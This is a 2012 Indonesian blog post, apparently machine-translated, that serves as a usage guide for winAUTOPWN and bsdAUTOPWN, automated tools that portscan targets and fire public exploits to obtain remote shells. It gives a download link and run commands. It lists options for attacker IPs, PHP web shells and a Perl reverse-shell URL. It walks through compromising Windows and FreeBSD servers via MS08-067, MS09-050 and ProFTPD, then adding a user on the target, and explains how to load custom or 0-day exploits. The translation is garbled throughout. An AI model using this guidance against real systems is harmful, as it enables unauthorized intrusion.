Rabu, 28 Maret 2012

winAUTOPWN


Apakah winAUTOPWN?
winAUTOPWN adalah minimal interaktif memanfaatkan kerangka yang bertindak sebagai frontend untuk eksploitasi kerentanan sistem cepat. Ini adalah koleksi eksploitasi remote menggunakan mana yang dapat membahayakan sistem rentan. winAUTOPWN mengambil input seperti IP alamat, nama host, CMS jalan, dll dan tidak portscan multi-threaded pintar untuk TCP port 1 untuk 65535. Port terbuka kemudian diakui dan eksploitasi berlaku untuk pelabuhan yang dieksekusi dengan tujuan memperoleh remote shell atau kemampuan untuk menjalankan perintah jauh dalam kasus tertentu.
Ringkas, WINDOWS AUTOPWN atau winAUTOPWN adalah shell auto (hacking) mendapatkan alat.
Selain di atas, winAUTOPWN juga dapat digunakan sebagai efisiensi pengujian alat untuk sistem deteksi intrusi (IDS) dan Web Aplikasi filter (WAF). winAUTOPWN memiliki sebuah repositori yang luas dari eksploitasi untuk berbagai sistem operasi seperti Microsoft Windows, Apple MAC OSX, Linux (beragam), sistem BSD juga sebagai untuk terkenal layanan dan daemon perangkat lunak. winAUTOPWN juga mengandung database besar-besaran dari eksploitasi kerentanan Upload Shell, Remote File Inklusi dan eksekusi perintah jauh. Ini dapat menembakkan satu demi satu langsung dan ini dapat ajudan memeriksa jika WAF adalah mencegah / menyiagakan sesuai terhadap ancaman tersebut atau tidak. Demikian pula shell bertujuan eksploitasi terlalu bisa ditembakkan berturut-turut untuk menguji kekuatan dan efektivitas dari id dan IP
winAUTOPWN juga memiliki sepupu BSD didasarkan yang disebut bsdAUTOPWN. bsdAUTOPWN adalah hanya seperti winAUTOPWN tetapi tidak tepat recompilation dari winAUTOPWN. Ditulis dari awal untuk dan pada FreeBSD OS untuk mencocokkan kekuatan dan fungsionalitas yang ditawarkan oleh sistem operasi. Seperti winAUTOPWN, bsdAUTOPWN bahkan memiliki fitur multi-threaded portscan dan juga mendeteksi port terbuka dan mencoba untuk mengeksploitasi mereka sesuai menggunakan eksploitasi tersedia di gudang senjata. Kami akan datang untuk diskusi rinci tentang bsdAUTOPWN kemudian.
Mengapa winAUTOPWN?
winAUTOPWN adalah kerangka yang hanya tersedia di Internet untuk tanggal yang mempertahankan gaya mengeksploitasi dan mengeksploitasi penulis dan, berkali-kali, eksploitasi utuh. Selain itu, yang mengeksploitasi digunakan hanya seperti itu tanpa mengubah fungsionalitas yang besar. Shellcodes atau dampak membuat bagian mengeksploitasi berkali-kali berubah dari "kalkulator peluncuran kode standar" untuk sebuah terpencil TCP port mengikat shellcode. Juga hardcoded halangan seperti alamat IP, port; URL, dll akan dihapus sesuai otomatisasi.
winAUTOPWN adalah antarmuka yang cepat dan kecil yang diperbarui secara teratur dengan baru-baru ini eksploitasi yang tersedia baik di alam liar maupun yang dirilis oleh vendor sendiri. winAUTOPWN adalah hanya tersedia mengeksploitasi kerangka yang akan menanyakan apa-apa tapi setidaknya rincian tentang target Anda. Anda tidak perlu khawatir tentang yang mengeksploitasi untuk mencoba ke port yang terbuka. Biarkan winAUTOPWN menanganinya untuk Anda.
Meskipun hal ini mungkin terdengar seperti permainan anak-anak-dengan script kiddie sikap, winAUTOPWN dapat digunakan dalam kedua buta menyerang juga seperti dalam pendekatan strategized cerdas. Ini memiliki fitur untuk menguji hanya sedikit disesuaikan (pengguna-ditulis/dipilih) eksploitasi dan/atau bahkan beberapa eksploitasi pre-loaded selektif menurut port terbuka keinginan penyerang juga menggunakan. Hal ini lebih dari hanya script kiddie alat dimana jika Anda sudah mengerti Anda target setup, Anda memiliki kebebasan untuk menguji keahlian Anda dengan menembak hanya terdekat eksploitasi yang menjanjikan, yang dapat membuat Anda cepat dalam, sehingga Anda lebih cepat daripada kebanyakan buta script kiddies.
Anda dapat memiliki beberapa contoh berjalan winAUTOPWN/bsdAUTOPWN (ketat dalam beberapa direktori) menargetkan beberapa target tanpa harus saling mengganggu. winAUTOPWN adalah hanya memanfaatkan kerangka kerja yang tidak kembali kode asli mengeksploitasi sepenuhnya dan menggunakan eksploitasi tersedia untuk umum yang dirilis melalui Internet.
Apakah bsdAUTOPWN?
Seperti disebutkan sebelumnya bsdAUTOPWN (BSD AUTOPWN) adalah versi BSD winAUTOPWN. Melakukan cukup banyak tindakan yang sama winAUTOPWN yang melakukan. BSD AUTOPWN menggunakan eksploitasi/direktori yang sama sebagai winAUTOPWN. Perhatikan bahwa BSD AUTOPWN sepenuhnya ditulis dari awal dan tidak baris-oleh-seperti replika atau langsung kompilasi/port dari winAUTOPWN. bsdAUTOPWN datang bersama dengan winAUTOPWN di direktori yang sama dan ada pkg BSD tidak terpisah untuk itu. BSD AUTOPWN dan relevan mengeksploitasi binari tersedia dalam bentuk yang dikompilasi untuk FreeBSD x 86, FreeBSD x 64 dan Dragonfly BSD x 86 dan nama file untuk binari utama, bsdAUTOPWN, bsdAUTOPWN.x64 dan bsdAUTOPWN.dfly.SVR4 masing-masing. Ini dapat diperiksa dengan brandelf pada sistem BSD.
Anda dapat men-download tool di sini: http://winautopwn.co.nr ekstrak file winAUTOPWN dan mengatur bendera eksekusi.
Untuk x 86 rilis, melakukan di bawah
chmod + x bsdAUTOPWN
. / bsdAUTOPWN
Untuk x 64 rilis, melakukan di bawah
chmod + x bsdAUTOPWN.x64
./bsdAUTOPWN.x64
Untuk DFLY SVR4 rilis, melakukan di bawah
chmod + x bsdAUTOPWN.dfly.SVR4
./bsdAUTOPWN.dfly.SVR4
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI3.png?9d7bd4
BSD AUTOPWN tidak akan berjalan pada platform Linux langsung. BSD AUTOPWN adalah terkecil dan tercepat sistem memanfaatkan kerangka yang tersedia untuk sistem FreeBSD.
Cara menggunakan winAUTOPWN?
Karena winAUTOPWN bergantung pada eksploitasi tersedia secara bebas yang ditulis dalam banyak bahasa, bahasa scripting seperti Perl, PHP dan Python diminta untuk hadir pada sistem di mana winAUTOPWN akan digunakan. Beberapa eksploitasi yang tersedia dan/atau ditulis dalam C, C#, Jawa atau bahasa lainnya kompiler berbasis pre-compiled dan mudah tersedia.
winAUTOPWN memiliki konsol intuitif yang mengambil input berikut:
  1. Menargetkan alamat Host IP-Enter sistem di mana Anda ingin menguji eksploitasi
  2. Target nama host-masukkan nama host sistem Target / nama DNS
  3. Penyerang dari IP address-masukkan alamat IP untuk menyambung kembali dan beberapa eksploitasi.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI4.png?9d7bd4
Ada pilihan lain juga diperlukan jika Anda berniat untuk menguji eksploitasi kerentanan aplikasi Web yang menggunakan winAUTOPWN, ini adalah:
  1. Menargetkan CMS jalan-masukkan jalur Content Management System. Hal ini biasanya nama folder pertama yang dianggap tepat setelah nama domain. Contoh: Jika URL http://www.somewebsite.com/application1/test.php kemudian jalur CMS adalah /application1
  2. Sebenarnya CMS Path-ini adalah lintasan yang sebenarnya CMS yang di-host pada Target Server. Contoh: /opt/share/www OR /opt/lampp/htdocs/logicx/tmp/agora
Secara default, karena sejumlah besar File jauh inklusi dan Remote Shell Upload dan eksekusi perintah jauh berbasis kerentanan tersedia dalam winAUTOPWN mengeksploitasi repositori, pilihan untuk menguji ini ditetapkan untuk OFF secara default. Untuk mengaktifkan mereka mulai winAUTOPWN dengan argumen:
winAUTOPWN –doRSHuntuk memaksa Remote Shell Upload Web-app kerentanan modul.
winAUTOPWN - doRFI untuk memaksa jauh inklusi File aplikasi Web kerentanan memindai modul.
winAUTOPWN - doRCE untuk memaksa eksekusi kode jauh Web-app kerentanan memindai modul.
  1. Jalan Shell interaktif PHP-ini adalah jalan lintasan web-shell PHP untuk digunakan bersama dengan Remote File Inklusi eksploitasi. Selalu ada jalan default dikodekan. Jalan Anda seharusnya terlihat seperti: http://somewebsite/r57.txt
    Ini opsional, tetapi sangat penting untuk RFI eksploitasi.
  2. Username Administrator CMS-ini adalah username CMS Admin jika diketahui penyerang. Ini opsional tapi penting dalam eksploitasi eskalasi hak istimewa tertentu, di mana aplikasi web dapat digunakan untuk mendapatkan kendali penuh atas server.
  3. Username FTP/CMS-satu ini username FTP / CMS Server jika diketahui penyerang.
  4. Password FTP/CMS-satu ini adalah sandi FTP / CMS Server jika diketahui penyerang.
  5. Proxy IP-ini adalah alamat Proxy IP yang dapat digunakan dalam beberapa eksploitasi yang mendukung fitur ini.
  6. Port proxy-ini adalah Port Proxy yang penyerang dapat digunakan dalam beberapa eksploitasi yang mendukung fitur ini.
http://resources.infosecinstitute.com/wp-content/uploads/ddriveAZIM.png?9d7bd4
Perhatikan bahwa winAUTOPWN akan menguji ini dan semua port 80 berbasis eksploitasi setelah menyelesaikan cek untuk eksploitasi pelabuhan lainnya.
winAUTOPWN memiliki Windows GUI juga, yang mengambil serupa masukan dan feed ke konsol winAUTOPWN utama:
http://resources.infosecinstitute.com/wp-content/uploads/GUI.png?9d7bd4
Contoh dari winAUTOPWN penuh GUI yang akan lulus pada argumen ke konsol:
http://resources.infosecinstitute.com/wp-content/uploads/Setting-up-Command-line.png?9d7bd4
Anda akan melihat dalam gambar di atas parameter disebut MAXTHREADS. Sistem operasi memiliki batas jumlah koneksi yang dapat dibuat untuk sebuah IP pada satu waktu. Ini adalah benar untuk alamat IP yang kami menghubungkan juga. Modul portscan built-in di dalam winAUTOPWN perubahan benang menurut alamat IP. Jika alamat IP pribadi di alam seperti 10.xxx atau 192.168.xx kemudian menetapkan 100 benang sebagai default. It's set lebih rendah jika alamat IP IP publik.
Ini dapat diganti dengan MAXTHREADS pilihan jika pengguna ingin melakukannya dalam kondisi di mana alamat IP publik yang digunakan dalam LAN swasta lokal. Ini juga dapat membantu dalam sebuah skenario di mana yang ingin Anda lakukan portscan sangat lambat.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI8.png?9d7bd4
Gunakan MAXTHREADS xx parameter seperti yang ditunjukkan di atas winAUTOPWN.exe MAXTHREADS 20 untuk menetapkan jumlah benang, dalam kasus ini 20.
Cara menggunakan baris perintah di winAUTOPWN?
Penggunaan baris perintah selalu tanda kuasa pengguna di setiap konsol berbasis penetrasi pengujian alat. winAUTOPWN's seluruh antarmuka interaktif dapat pre-fed dengan nilai-nilai yang menggunakan opsi baris perintah seperti yang dijelaskan di bawah ini:
  • -skipscan Pilihan ini dapat memaksa winAUTOPWN untuk melewatkan modul port-scan dan menggunakan file OpenPorts.TXT dalam direktori. Ini adalah fitur berguna ketika Anda tahu apa terbuka port tersedia pada sistem target Anda. Salah satu hanya dapat mengisi nomor port dan menyimpan file. Hal ini juga membantu dalam situasi ketika Anda ingin winAUTOPWN untuk memeriksa eksploitasi untuk satu atau beberapa port tertentu.
Contoh winAUTOPWN.exe –skipscan
  • -onlyscan Pilihan ini dapat memaksa winAUTOPWN untuk melewati seluruh mengeksploitasi pengujian modul. Oleh karena itu, dengan menggunakan winAUTOPWN modul ini hanya akan melakukan PortScan dan akan keluar setelah mencetak daftar OpenPorts.
Contoh winAUTOPWN.exe –onlyscan
  • -targetIPPilihan ini dapat digunakan untuk memberikan alamat Target IP sistem yang sedang diuji. Pastikan Anda menentukan alamat IP setelah itu.
Contoh winAUTOPWN.exe –targetIP 192.168.3.3
  • -targetHOSTPilihan ini dapat digunakan untuk memberikan Target Hostname sistem yang sedang diuji. Pastikan Anda menentukan nama Netbios lengkap untuk sistem Windows pada LAN dan seluruh nama domain untuk sistem Target WAN.
Contoh winAUTOPWN.exe –targetHOST sistem-2
winAUTOPWN.exe –targetHOST www.somewebsite9.com
  • -attackerIPPilihan ini dapat digunakan untuk memberikan Anda sendiri IP, yang merupakan penyerang dari alamat IP sistem dari mana winAUTOPWN yang dijalankan. Pastikan Anda menentukan alamat IP setelah itu.
Contoh winAUTOPWN.exe –attackerIP 192.168.3.34
  • -cmsPATHPilihan ini dapat digunakan untuk menentukan nama direktori Content Management System dalam URL. Umumnya ini adalah nama direktori pertama setelah akhir nama Domain atau alamat IP. Pastikan bahwa Anda menentukan cmsPATH benar. Anda dapat meninggalkan ini kosong jika Anda tidak berniat untuk menguji eksploitasi kerentanan aplikasi web.
Contoh winAUTOPWN.exe –cmsPATH /xampp
  • -actcmsPATHPilihan ini dapat digunakan untuk menentukan sebenarnya Content Management System atau internal sebenarnya CMS jalan URL. Umumnya hal ini tidak terlihat dalam URL. Banyak kali paket CMS yang diinstal pada server web memiliki default path membuatnya mudah guessable. Pastikan bahwa Anda menentukan actcmsPATH benar. Anda dapat meninggalkan ini kosong jika Anda tidak berniat untuk menguji eksploitasi kerentanan aplikasi web.
Contoh winAUTOPWN.exe –actcmsPATH /Applications/xampp
winAUTOPWN.exe –actcmsPATH/opt/xampp
  • -phpshellPATHPilihan ini dapat digunakan menentukan path online PHP Web-kulit yang akan digunakan bersama dengan Remote File Inklusi kerentanan Exploits. Ada jalan web shell PHP default dikodekan. Untuk mengubahnya, memastikan bahwa Anda menentukan phpshellPATH benar yang menerima variabel bernama CMD untuk mengeksekusi perintah sistem. GET permintaan akan terlihat seperti http://shellp.ath/shell.php?CMD = ls
Anda dapat meninggalkan ini kosong jika Anda tidak berniat untuk menguji eksploitasi kerentanan aplikasi web.
Contoh winAUTOPWN.exe –phpshellPATH http://website.moc/folder/r57.txt
  • -actphpshellPATHPilihan ini dapat digunakan menentukan path internal sebenarnya online PHP Web-kulit yang akan digunakan bersama dengan Remote File Inklusi kerentanan Exploits. Anda dapat meninggalkan ini kosong jika Anda tidak berniat untuk menguji eksploitasi kerentanan aplikasi web.
Contoh winAUTOPWN.exe –actphpshellPATH /var/log/tmp
  • -cmsadminUSRPilihan ini dapat digunakan menentukan administrator /admin username jika diketahui. Hal ini diperlukan untuk beberapa aplikasi web eksploitasi untuk bekerja dengan benar. Anda dapat meninggalkan ini kosong jika Anda tidak berniat untuk menguji eksploitasi kerentanan aplikasi web.
Contoh winAUTOPWN.exe –cmsadminUSR admin9
  • -ftpUSRPilihan ini dapat digunakan menentukan nama FTP pengguna jika diketahui. Hal ini diperlukan untuk beberapa FTP eksploitasi untuk bekerja dengan benar. Jika Anda membiarkannya kosong winAUTOPWN akan mengatur internal default FTP Username.
Contoh winAUTOPWN.exe –ftpUSR user6
  • -ftpPASSWDPilihan ini dapat digunakan untuk menentukan FTP Password jika diketahui. Hal ini diperlukan untuk beberapa FTP eksploitasi untuk bekerja dengan benar. Jika Anda membiarkannya kosong winAUTOPWN akan mengatur internal default FTP Password.
Contoh winAUTOPWN.exe –ftpPASSWD S3cR37P@55W0rD
  • -perlrevshURLPilihan ini dapat digunakan menentukan path script Perl terpencil yang harus mampu mengirim / bin/sh atau setara shell untuk IP terpencil. Script idealnya harus memiliki kemampuan untuk dipanggil sebagai perl <remote_ip> <remote_port>. Perhatikan bahwa remote_IP akan IP Anda yang target Anda akan menghubungkan dan remote_port akan menjadi sebuah pelabuhan dibuka IP Anda. Anda tidak perlu khawatir tentang memberikan parameter untuk berkas Perl atau membuka port lokal, winAUTOPWN akan secara otomatis menangani hal itu, karena itulah yang WINDOWS AUTOPWN benar-benar berarti. Juga mencatat bahwa setiap script Perl dengan kemampuan ini dapat digunakan dan dapat di-host pada server web apapun. Pilihan ini hanya membutuhkan path ke file Perl ini. Ini Perl script akan menunjuk dan digunakan dalam beberapa eksploitasi di mana remote menghubungkan kembali shell digunakan sebagai muatan. Ada jalan shell Perl default dikodekan sehingga jika Anda memiliki tidak tahu atau sumber online, Anda dapat meninggalkan pilihan ini kosong dan winAUTOPWN akan mencoba untuk menangani hal itu sendiri.
Contoh winAUTOPWN.exe –perlrevshURL http://website.moc/various/reverse-shell.pl
  • -mailFROMPilihan ini dapat digunakan untuk menentukan alamat email pengirim akan digunakan dalam beberapa SMTP eksploitasi. Bidang ini memiliki alamat e-mail pengirim default yang dibuat oleh winAUTOPWN. It's always root @ <target_hostname> di mana target nama host adalah –targetHOST disediakan sebelumnya. Anda dapat mengatur nilai bidang ini untuk menimpa default nilai set.
Contoh winAUTOPWN.exe –mailFROM admin@some.web.info
  • -mailTOPilihan ini dapat digunakan menentukan alamat email penerima untuk digunakan dalam beberapa SMTP eksploitasi. Bidang ini memiliki alamat email penerima default yang dibuat oleh winAUTOPWN. It's always postmaster @ <target_hostname> di mana target nama host adalah –targetHOST disediakan sebelumnya. Anda dapat mengatur nilai bidang ini untuk menimpa default nilai set.
Contoh winAUTOPWN.exe –mailTO postmaster@some.web.info
  • -proxyIPPilihan ini dapat digunakan untuk memberikan alamat Proxy Server IP. Perhatikan bahwa hanya beberapa eksploitasi mendukung proxy dan yang juga jika Anda telah disediakan Proxy IP dan Proxy port. Pastikan Anda menentukan alamat Proxy IP yang benar setelah itu.
Contoh winAUTOPWN.exe –proxyIP 192.168.3.80
  • -proxyPORTPilihan ini dapat digunakan untuk memberikan nomor Port Server Proxy. Perhatikan bahwa hanya beberapa eksploitasi mendukung proxy dan yang juga jika Anda telah disediakan Proxy IP dan Proxy port. Memastikan yang Anda tentukan Alamat Proxy nomor Port yang benar setelah itu.
Contoh winAUTOPWN.exe –proxyIP 8080

Dapatkah Anda menunjukkan winAUTOPWN di Action?

Skenario I: Windows Home Server / Windows 2003 Server

Screenshot yang diberikan di bawah ini adalah penjelasan yang baik melihat bsdAUTOPWN dalam tindakan. Parameter seperti Target IP, Target HostName dan penyerang IP ditentukan. Setelah ini, bsdAUTOPWN tidak portscan dan tes semua tua eksploitasi juga baru-baru ini, dan jika beruntung, membuat Anda shell. Dalam contoh di bawah target sistem adalah rentan terhadap kerentanan MS08-067 terkenal (yang juga digunakan oleh Conficker untuk menyebarkan itu sendiri).
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI9.png?9d7bd4
Pada gambar di atas, bsdAUTOPWN disediakan dengan Target IP, Target Hostname dan penyerang IP. Karena kami tidak bermaksud untuk menembus sistem target menggunakan aplikasi web saat ini kami tidak masuk parameter aplikasi web seperti CMS jalan / CMS Username, CMS Password, dll.
Kita perlu memberikan satu parameter lainnya di sini yang merupakan sistem operasi Target. Ada cara untuk menentukan sistem operasi yang Target Anda berjalan. Cara sederhana untuk melakukan hal ini untuk Windows Server OS adalah untuk memeriksa apakah Layanan Terminal menjalankan. Sambungan sederhana ke RDP port akan memberikan banner / gambar dan akan membantu Anda fingerprint langsung. Gambar di bawah menunjukkan bahwa target adalah menjalankan Windows Home Server yang benar-benar didasarkan pada Windows 2003.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI10.png?9d7bd4
Kita memasuki sesuai Target OS (nomor tiga dalam kasus ini untuk Windows Server 2003 / Home 2011).
BSD AUTOPWN (yang berjalan pada FreeBSD 8.2 dalam kasus ini) melakukan portscan dan menunjukkan semua port terbuka dari sistem itu. BSD AUTOPWN / WINDOWS AUTOPWN memiliki ulir smart-portscan yang mengubah jumlah thread menurut sifat IP. Untuk jaringan Area lokal atau IP pribadi menggunakan banyak benang, tetapi karena jumlah koneksi terbuka mungkin batas untuk website IP publik atau karena peraturan ISP Anda, ini diatur ke 10 secara default untuk IP publik. Tentu saja ini dapat dirusak dengan parameter MAXTHREADS seperti yang dijelaskan sebelumnya.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI11.png?9d7bd4
Setelah menyelesaikan portscan itu menyimpan hasil dalam OpenPorts.TXT dan mulai menangani satu port pada satu waktu, mulai dengan yang pertama-port 80. Kebakaran semua eksploitasi tahu untuk default webserver port. Perhatikan bahwa bsdAUTOPWN tidak berisi eksploitasi aplikasi web seperti Remote File termasuk, Shel meng-Upload dan eksekusi kode jauh mengeksploitasi kelemahan aplikasi web. Ini berisi penargetan kerentanan webserver eksploitasi langsung. Anda dapat menggunakan winAUTOPWN jika Anda berniat untuk mengeksploitasi RFI, RCE dan Remote Shell Upload kerentanan.
Keluar dari pelabuhan-pelabuhan ini satu mengeksploitasi penargetan MS08-067 berhasil dan penyerang memperoleh shell.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI12.png?9d7bd4
Gambar di atas menunjukkan bahwa target IP 192.168.1.1 dengan nama host WINSERVER-2011 (seperti mengetik di sebelumnya) telah berhasil dieksploitasi.
Sekarang kita menambahkan pengguna bernama winautopwn dan log in ke Target dan login menggunakan klien Layanan Terminal.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI13.png?9d7bd4
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI14.png?9d7bd4
Gambar di atas menunjukkan bahwa kita login dan kami menambahkan sebuah file pada C:\Documents and Settings\winautopwn\Desktop\winautopwn.txt menggunakan shell yang kita peroleh. Hal ini mencerminkan langsung pada sistem dikompromikan di antarmuka RDesktop.
Anda hanya WINAUTOPWN-ed sistem rentan!

Skenario II: FreeBSD 7.2Release (FTP Server)

Screenshot yang diberikan di bawah ini adalah penjelasan yang baik melihat bsdAUTOPWN dalam tindakan yang mencoba untuk mengeksploitasi FreeBSD Server menjalankan versi rentan ProFTPD.
Dalam contoh ini, kami menggunakan baris perintah:
. / bsdAUTOPWN –skipscan
Karena kita sudah memiliki port 21 untuk FTP Server dalam pikiran kita, hanya beberapa pilihan diperlukan minimal diisi. Kami memberikan alamat Target IP, Target nama host dan penyerang kita sendiri alamat IP yang diperlukan untuk beberapa menghubungkan kembali eksploitasi dan shellcodes.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI15.png?9d7bd4
Bersama dengan pilihan ini pilihan penting lain harus diisi untuk sesi ini dan yang harus hampir diisi untuk semua bsdAUTOPWN sesi adalah entri "Target OS". Mengisi ini membuat lebih mudah untuk bsdAUTOPWN untuk memilih eksploitasi yang harus ditargetkan dan menggunakan parameter yang OS-spesifik.
Di sini dalam hal ini seperti yang Anda lihat di bawah ini, kami telah memilih Target OS sebagai 13 yang FreeBSD (x 86).
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI16.png?9d7bd4
Setelah memberikan masukan-masukan ini kita dapat melihat bahwa bsdAUTOPWN langsung mem-parsing OpenPorts.TXT file dan memeriksa daftar port terbuka (seperti yang disebutkan sebelumnya).
Melihat port 21 terbuka kebakaran semua FTP server berhubungan eksploitasi. Al banyak FTP Server terkait eksploitasi memerlukan otentikasi. Bahkan jika salah satu belum disediakan ini di layar entri bsdAUTOPWN pertama, masih ini akan otomatis yang dihasilkan oleh bsdAUTOPWN.
Setelah pengujian beberapa FTP Server terkait eksploitasi, akhirnya mencapai untuk menguji ProFTPD 1.3.2e berjalan di Server Target kami. Parameter mengeksploitasi diatur dan mengeksploitasi ini dipecat untuk menjalankan kode mengeksploitasi menurut FreeBSD 7,2 lingkungan untuk 1.3.2e ProFTPD Server.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI17.png?9d7bd4
Muatan asli untuk mengeksploitasi ini sebagai tersedia terbuka untuk Linux dan FreeBSD lingkungan adalah reverse menghubungkan muatan yang mengharuskan Anda untuk menggunakan netcat dan menjaga sebuah port mendengarkan mode.
Muatan ini telah berubah/dimodifikasi untuk mengikat shell pada pelabuhan yang telah ditentukan.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI18.png?9d7bd4
Usaha sukses seperti ini, memberikan penyerang shell menggunakan antarmuka telnet ke sistem Target.

Skenario III: Windows Server 2008

Screenshot yang diberikan di bawah ini adalah penjelasan yang baik melihat bsdAUTOPWN dalam tindakan yang mencoba untuk mengeksploitasi setup Windows Server.
Dalam contoh lain di bawah membiarkan menggunakan target pelabuhan SMB sekali lagi. Kali ini mari kita melompat portscan lagi dengan asumsi skenario di mana penyerang tahu daftar port terbuka dan tersangka yang sesuai layanan/daemon terkait dengan mereka dapat rentan.
Untuk melewati port scan pada winAUTOPWN pertama menyimpan daftar port terbuka satu di bawah yang lain di OpenPorts.TXT
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI19.png?9d7bd4
dan kemudian ketik:
winAUTOPWN.exe –skipscan
Anda mungkin pergi satu langkah ke depan dan memberikan parameter lain dalam baris perintah itu sendiri yang akan anyways diminta dalam sesi interaktif.
winAUTOPWN.exe –skipscan - targetIP 192.168.5.128 –attackerIP 192.168.5.24

http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI20.png?9d7bd4
Setelah kami menyediakan semua argumen sisa (wajib dan opsional) winAUTOPWN membuka OpenPorts.TXT menangani satu port pada waktu dan kebakaran semua eksploitasi untuk port tertentu yang dikenal untuk itu.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI21.png?9d7bd4
Sebagaimana kita dapat melihat di sini, itu telah selesai memeriksa FTPd eksploitasi dan sekarang adalah pengujian NetBIOS eksploitasi:
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI22.png?9d7bd4
Mencapai port 445 di OpenPorts.TXT dan mulai eksploitasi SMB kita dapat melihat winAUTOPWN memeriksa jika target adalah rentan untuk NetDDE buffer overflow (MS04-031) dan MS08-067 mengeksploitasi. Perhatikan bahwa ia memiliki lebih dari satu tersedia eksploitasi kerentanan di atas. winAUTOPWN tes setiap mengeksploitasi yang berlaku untuk layanan SMB (dan setiap layanan) yang terdapat dalam eksploitasi/direktori.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI23.png?9d7bd4
WINDOWS AUTOPWN terus menembakkan eksploitasi tanpa pengguna harus berinteraksi dengan konsol untuk memberikan argumen eksploitasi atau ada masukan. Input apa pun dibawa di layar pertama digunakan kembali di sini dan parameter mengeksploitasi adalah auto ditangani oleh winAUTOPWN.
Di sini kita bisa melihat MS05-039-Windows Plug-and-Play layanan layanan Remote Overflow mengeksploitasi dan SRV2.SYS bernegosiasi ProcessID fungsi tabel Dereference memanfaatkan yang sedang diuji.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI24.png?9d7bd4
Kami menemukan bahwa winAUTOPWN berhasil mengeksploitasi SMBV2 bernegosiasi fungsi kerentanan mengeksploitasi (MS09-050) (CVE-2009-3103) dan keuntungan shell dengan cepat.
Mengeksploitasi ini dikompilasi untuk winAUTOPWN dan tidak oleh penulis mengeksploitasi yang hanya dirilis sumber. Setelah sedikit mengutak-atik sumber kode berhasil dikompilasi dan mengikat cmd shell pada target pada port 2876. winAUTOPWN telnets ke port sehingga memberikan penyerang shell.
Catatan bahwa non - MS Windows menandatangani telnet.exe khusus dibuat tersedia dalam eksploitasi / direktori. Ini adalah hanya dalam kasus pengguna tidak memiliki telnet.exe di WINDOWS / atau WINDOWS/SYSTEM32/direktori.
Anda dapat mengganti NetCat dan mengubah nama nc.exe telnet.exe juga jika Anda ingin menggunakan NetCat sebagai default Anda menghubungkan aplikasi.
http://resources.infosecinstitute.com/wp-content/uploads/050511_1642_winAUTOPWNI25.png?9d7bd4
Gambar di atas menunjukkan perintah sederhana seperti ipconfig dan nama host dan menegaskan bahwa Target IP adalah winAUTOPWN-ed dalam detik!!
Tapi menyenangkan tidak berakhir di sini. WINDOWS AUTOPWN terus pengujian lain eksploitasi untuk semua port yang tersisa setelah pengguna keluar shell yang diperoleh. Ini membantu penyerang untuk bahkan menghitung dan merekam nomor dan nama kerentanan dieksploitasi.

Cara memuat baru dan personalisasi eksploitasi winAUTOPWN?

WINDOWS AUTOPWN menjadi kerangka mendukung eksploitasi yang ditulis dalam hampir semua bahasa di vogue. Jika Anda berniat untuk menulis mengeksploitasi Anda sendiri dan menjalankannya di winAUTOPWN, ini sangat sederhana untuk mencapai itu. Anda dapat menulis eksploitasi dalam Perl, Python, PHP, C (disusun) dan Java (disusun).
Anda bahkan dapat menyertakan Anda eksploitasi 0-hari yang dimuat di winAUTOPWN.
Fitur ini dari WINDOWS AUTOPWN disebut WINDOWS AUTOPWN MENGEKSPLOITASI LOADING
KERANGKA [welf] dan welf bahasa scripting disebut baik atau WINDOWS AUTOPWN MENGEKSPLOITASI LOADING bahasa.
Setelah Anda memiliki mengeksploitasi Anda dijalankan siap, semua yang perlu Anda lakukan adalah untuk menyalin mereka dalam welfexploits / direktori. Setelah ini berjalan winAUTOPWN dengan parameter –welf bersama dengan nama berkas skrip welf. Seharusnya terlihat seperti ini:
winAUTOPWN.exe –welf myWELFexploits.txt
MyWELFexploits.txt file (dalam kasus di atas) akan berisi baris scripted di sumur.
Sintaks ini sangat sederhana. Pertimbangkan argumen mengeksploitasi berikut:
rpcdcom.exe 0 10.40.140.23 135

Bagaimana menulis ini dengan baik?
Di sini rpcdcom.exe mengeksploitasi nama dan pra dikompilasi PE biner.
0 adalah parameter tambahan yang perlu diikuti oleh alamat Target IP dan Port.
Oleh karena itu, myWELFexploits.txt Anda harus berisi
<PE> rpcdcom.exe 0 <TARGETIP> 135 ^ ^ ^ ^
Pertimbangkan contoh lain:
Perl king_cms_0.3_exploit.pl www.website.com /kingcms /usr/home/tim/www/kingcms
Mengeksploitasi ini sejak ditulis dalam perl, welf-script baris dimulai dengan itu. Jika mengeksploitasi di PHP, itu akan membaca PHP <exploitname> < lain parameter-> ^ ^ ^ ^
^ ^ ^ ^ Menandakan akhir dari argumen untuk baris tertentu dan itu adalah EOL
Itu adalah ultratag wajib untuk memberitahukan WELF bahwa naskah mengeksploitasi mengeksploitasi tertentu telah selesai dan sekarang dapat mengurai berikutnya.
Jadi, jangan lupa untuk menulis ^ ^ ^ ^ setelah setiap baris script mengeksploitasi.
Anyways, mengeksploitasi PERL di atas dapat ditambahkan di welfexploits / direktori dan garis di myWELFexploits harus membaca
<PERL> king_cms_0.3_exploit.pl <TARGETHOSTNAME> <CMSPATH> <ACTUALCMSPATH> ^ ^ ^ ^
Apa yang lain WELF Scripting terminologi?
<LANGNAME> dapat menjadi <PYTHON>, <PERL>, <PHP> atau < PE >(for exe files)
